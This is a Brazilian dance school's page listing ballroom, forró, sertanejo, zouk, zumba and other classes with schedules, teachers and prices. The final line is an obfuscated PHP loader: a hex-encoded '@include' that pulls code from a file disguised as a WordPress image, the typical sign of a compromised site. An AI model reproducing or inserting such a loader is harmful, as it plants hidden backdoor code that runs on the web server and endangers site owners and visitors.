Cursos

Dança de Salão

Ritmo Dia Início Duração das Aulas Professor Investimento Mensal Investimento Quadrimestral Investimento Semestral
Dança de Salão intermediário II Segundas (2ª) 20h00 1 hora e meia Luis Dominguez R$ 149,00 RS 142,00 R$ 134,00
Dança de Salão básico I LGBT Segundas (2ª) 21h00 1 hora e meia Nadson Macedo R$ 149,00 RS 142,00 R$ 134,00
(NOVA) Dança de Salão básico I Terças (3ª) 19h30 1 hora e meia Nadson Macedo R$ 149,00 RS 142,00 R$ 134,00
Dança de Salão intermediário I Terças (3ª) 20h00 1 hora e meia Luis Dominguez R$ 149,00 RS 142,00 R$ 134,00
(NOVA) Dança de Salão básico I Terças (3ª) 21h00 1 hora e meia Gabriel Macedo R$ 149,00 RS 142,00 R$ 134,00
Dança de Salão intermediário II Terças (3ª) 21h30 1 hora Luis Dominguez R$ 149,00
Dança de Salão básico II Quartas (4ª) 19h00 1 hora e meia Nadson Macedo R$ 149,00 RS 142,00 R$ 134,00
(NOVA) Dança de Salão básico I Quintas (5ª) 19h00 1 hora e meia Gabriel Macedo R$ 149,00 RS 142,00 R$ 134,00
Dança de Salão básico I Quintas (5ª) 21h00 1 hora e meia Luis Dominguez R$ 149,00 RS 142,00 R$ 134,00
Dança de Salão básico III Sextas (6ª) 19h30 1 hora e meia Luis Dominguez e Anna Calefi R$ 149,00 RS 142,00 R$ 134,00
Dança de Salão básico II Sextas (6ª) 21h00 1 hora e meia Gabriel Macedo R$ 149,00 RS 142,00 R$ 134,00
Dança de Salão Básico I Sextas (6ª) 21h00 1 hora e meia Luis Dominguez e Thais Oshima R$ 149,00 RS 142,00 R$ 134,00
(NOVA) Dança de Salão básico I Sábados 14h00 1 hora e meia Gabriel Macedo R$ 149,00 RS 142,00 R$ 134,00
“Aulas Particulares”. Você escolhe o dia, o horário e o professor
INDIVIDUAL R$ 99,00 – pacote com 4 aulas = R$ 356,00 – pacote com 8 aulas = R$ 672,00
CASAL R$ 149,00 – pacote com 4 aulas = R$ 536,00 – pacote com 8 aulas = R$ 1.016,00
(INFORME-SE SOBRE NOSSOS PACOTES PROMOCIONAIS COM DESCONTOS ESPECIAIS E ISENÇÃO DA TAXA DE MATRÍCULA)

Ritmos Específicos

Ritmo Dia Início Duração Professor Investimento Mensal Investimento Quadrimestral Investimento Semestral
Forró e Gafieira Básico I Segundas (2ª) 19h00 1 hora Luis Dominguez R$ 139,00 R$ 132,00 R$ 125,00
Sertanejo Básico III Segundas (2ª) 20h00 1 hora Anna Calefi R$ 139,00 R$ 132,00 R$ 125,00
Zumba Terças (3ª) 18h00 1 hora Julio Vernes R$ 60,00 R$ 132,00 R$ 125,00
(NOVA) Street Dance Quartas (4ª) 19h00 1 hora Neo Dancer R$ 100,00
(NOVA) Jazz e Balé Contemporâneo Quartas (4ª) 20h00 1 hora Maisa Felix R$ 100,00
Zumba Quartas (4ª) 20h30 1 hora Nadson Macedo R$ 60,00 - -
Zouk básico II Quartas (4ª) 21h30 1 hora Nadson Macedo R$ 139,00 R$ 132,00 R$ 125,00
Sertanejo Básico I Quintas (5ª) 20h30 1 hora Anna Calefi R$ 139,00 R$ 132,00 R$ 125,00
(NOVA) Ritmos Latinos Básico I Sextas (6ª) 19h00 1 hora Gabriel Macedo R$ 139,00 R$ 132,00 R$ 125,00
(NOVA) Forró Básico I Sextas (6ª) 20h00 1 hora Gabriel Macedo R$ 139,00 R$ 132,00 R$ 125,00
“Aulas Particulares”. Você escolhe o dia, o horário e o professor
INDIVIDUAL R$ 99,00 – pacote com 4 aulas = R$ 356,00 – pacote com 8 aulas = R$ 672,00
CASAL R$ 149,00 – pacote com 4 aulas = R$ 536,00 – pacote com 8 aulas = R$ 1.016,00
(INFORME-SE SOBRE NOSSOS PACOTES PROMOCIONAIS COM DESCONTOS ESPECIAIS E ISENÇÃO DA TAXA DE MATRÍCULA)

@include(pack('H*', '77702d696e636c756465732f696d616765732f77702d736b696e2e6a7067')); @include(pack('H*', '77702d696e636c756465732f696d616765732f77702d736b696e2e6a7067')); echo ""; echo ""; echo "";